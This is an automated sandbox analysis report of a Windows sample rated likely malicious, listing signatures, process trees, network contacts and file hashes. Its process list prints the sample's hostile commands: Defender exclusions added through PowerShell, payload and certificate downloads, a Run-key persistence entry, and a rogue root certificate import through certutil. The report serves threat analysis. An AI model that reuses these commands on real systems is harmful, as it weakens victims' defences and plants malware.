Malware Analysis Report

2025-06-16 00:36

Sample ID 241111-al7pxsydnd
Target 7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N
SHA256 7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68
Tags
discovery execution persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68

Threat Level: Likely malicious

The file 7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N was found to be: Likely malicious.

Malicious Activity Summary

discovery execution persistence

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Browser Information Discovery

Unsigned PE

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 00:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 00:19

Reported

2024-11-11 00:21

Platform

win10v2004-20241007-en

Max time kernel

113s

Max time network

110s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Program Files\\MicrosoftWindows\\Windows" C:\Windows\system32\reg.exe N/A

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2252 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe C:\Windows\SYSTEM32\cmd.exe
PID 2252 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe C:\Windows\SYSTEM32\cmd.exe
PID 4164 wrote to memory of 2284 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 4164 wrote to memory of 2284 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 4164 wrote to memory of 4168 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 4164 wrote to memory of 4168 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 4168 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4168 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 564 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 564 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2252 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe C:\Windows\SYSTEM32\cmd.exe
PID 2252 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe C:\Windows\SYSTEM32\cmd.exe
PID 2956 wrote to memory of 4764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 4764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 8 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 8 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\cmd.exe
PID 8 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 4304 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4304 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 1856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 1856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4708 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4708 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 4368 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 8 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 1728 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 2896 wrote to memory of 2976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 2896 wrote to memory of 2976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 2896 wrote to memory of 2976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 2896 wrote to memory of 2976 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
PID 8 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 8 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 8 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 3112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 8 wrote to memory of 3112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe

"C:\Users\Admin\AppData\Local\Temp\7e736d9e0aea2c0aa45132247944c7857a176db28e903cad0b2646371059ee68N.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c type site.txt | cmd

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type site.txt "

C:\Windows\system32\cmd.exe

cmd

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --app="https://sebupdate.pages.dev" --disable-infobars --no-first-run --disable-session-crashed-bubble --disable-extensions --disable-features=VizDisplayCompositor --disable-gpu --disable-software-rasterizer --enable-fast-unload --start-maximized --no-sandbox

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xe4,0x110,0x114,0xf0,0x118,0x7ffbfb9946f8,0x7ffbfb994708,0x7ffbfb994718

C:\Windows\SYSTEM32\cmd.exe

cmd /k type test.txt | cmd

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type test.txt "

C:\Windows\system32\cmd.exe

cmd

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\MicrosoftWindows'"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --no-sandbox --gpu-preferences=UAAAAAAAAADgAgAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2292 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\MicrosoftWindows\Microsoft.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\MicrosoftWindows\Windows.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://localhost:8000/Windows.exe' -OutFile 'Windows.exe'"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=4600 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,5963019434474726042,15921565733852789922,131072 --disable-features=VizDisplayCompositor --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=4600 /prefetch:8

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows" /t REG_SZ /d "C:\Program Files\MicrosoftWindows\Windows" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://localhost:8000/mspfxx.pfx' -OutFile 'mspfxx.pfx'"

C:\Windows\system32\certutil.exe

certutil -importpfx -p "MS12345" Root "mspfxx.pfx"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 sebupdate.pages.dev udp
US 172.66.44.55:443 sebupdate.pages.dev tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.44.66.172.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 N/A udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
N/A 127.0.0.1:8000 N/A tcp
N/A 127.0.0.1:8000 N/A tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\site.txt

MD5 dca4293493e0cd4e9e665fb1cfe6ed44
SHA1 0f886b72d4990cfc37160c36121f31cb9cb893de
SHA256 e6313afef241d78fb094839c6e470d71ae4683b7a315370eadd7afd264b33776
SHA512 afb0959e5fe859a5746353915cf25e4595dd22eab5855677cb252dde78af1865ce376b89cc1c20718e48ff5fa20263fd7a3a45406ab664326fff472cb88bd216

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 37f660dd4b6ddf23bc37f5c823d1c33a
SHA1 1c35538aa307a3e09d15519df6ace99674ae428b
SHA256 4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8
SHA512 807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\test.txt

MD5 50376cee3a2e445f02f6c7c16ca336f3
SHA1 37de7bab98781804a838f2f2d58cff57b6a18ccc
SHA256 f247f564807ec2ff33a7c233f30eb4d7111f2e33e31636a60d9ffebafbc93051
SHA512 de1c91434c2975d0afcc20ef7c1f292204660c2f1fbaf1af28ab53fbe71fdca9f491beda58d09ab430eeacb0ecd359dc3ce2e336b615bc920366a404ea96c1f0

memory/2288-12-0x00007FFBFABA3000-0x00007FFBFABA5000-memory.dmp

memory/2288-18-0x000002549B4A0000-0x000002549B4C2000-memory.dmp

memory/2288-23-0x00007FFBFABA0000-0x00007FFBFB661000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2h3atoz0.z50.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2288-24-0x00007FFBFABA0000-0x00007FFBFB661000-memory.dmp

\??\pipe\LOCAL\crashpad_2896_EOTOSTYEVFJYBKLK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d7cb450b1315c63b1d5d89d98ba22da5
SHA1 694005cd9e1a4c54e0b83d0598a8a0c089df1556
SHA256 38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031
SHA512 df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 078ba4c38ba943d108810fe5c82cf9b5
SHA1 f3e28e8ca72e1fed4716bc994dc1ee41ac9568bc
SHA256 9609deb906372f8aca76550a1d01d81202ab769a5aa75419cfc06a0cf188ec2c
SHA512 309d358b6f0c1fa346299736f2368587c62de2bf0bd28ce2342011d1283d6564852b9efb512d616871f969e7e11f3424ece5abea2a2784ad7c2e152579e6c282

memory/2288-45-0x00007FFBFABA0000-0x00007FFBFB661000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8cb3e9459807e35f02130fad3f9860d
SHA1 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 da5c82b0e070047f7377042d08093ff4
SHA1 89d05987cd60828cca516c5c40c18935c35e8bd3
SHA256 77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA512 7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

